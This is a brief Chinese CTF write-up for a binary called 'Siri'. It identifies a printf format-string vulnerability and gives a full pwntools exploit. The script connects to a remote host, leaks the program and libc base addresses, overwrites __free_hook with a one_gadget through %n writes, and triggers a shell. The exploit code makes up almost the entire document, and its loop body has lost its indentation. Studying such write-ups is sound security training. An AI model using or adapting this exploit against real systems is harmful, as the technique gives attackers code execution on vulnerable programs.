漏洞点在sub_1212函数,printf(%s)造成格式化漏洞
思路是先通过格式化漏洞打印出程序基址和LIBC基址,然后修改free_hook为onegadget,再打印大量数据即可
最终的exp如下:
#coding:utf8
from pwn import *
#context.log_level = "debug"
x=0
while(1):
# p = process("./Siri")
p = remote('123.56.170.202', 12124)
p.recvuntil(">>> ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
p.sendline("Remind me to %1$p,%2$p,%3$p,%4$p,%5$p,")
p.recvuntil(">>> OK, I'll remind you to ")
buf=p.recvuntil(",(nil),(nil),")
prog_base=int(buf[2:-13],16)&0xffffffffffff000-0x2000
log.info("prog_base @ 0x%x"%(prog_base))
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
p.sendline("Remind me to %83$p,%2$p,%3$p,")
p.recvuntil(">>> OK, I'll remind you to ")
buf=p.recvuntil(",(nil),(nil),\n")
libc_base=(int(buf[2:-14],16)&0xffffffffffff000)-0x21000 # libc_start_main
free_hook=libc_base+0x3ed8e8
gadget=libc_base+0x10a45c
log.info("libc_base @ 0x%x"%(libc_base))
log.info("free_hook @ 0x%x"%(free_hook))
log.info("gadget @ 0x%x"%(gadget))
for i in range(6):
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
p.sendline("Remind me to %%%03dx%%15$nAAA"%((ord(p64(gadget)[i])-27+256)%256)+p64(free_hook+i))
p.recvuntil(">>> OK, I'll remind you to ")
p.sendline("Hey Siri!")
p.recvuntil("What Can I do for you?")
p.sendline("Remind me to %100000c")
p.interactive()
break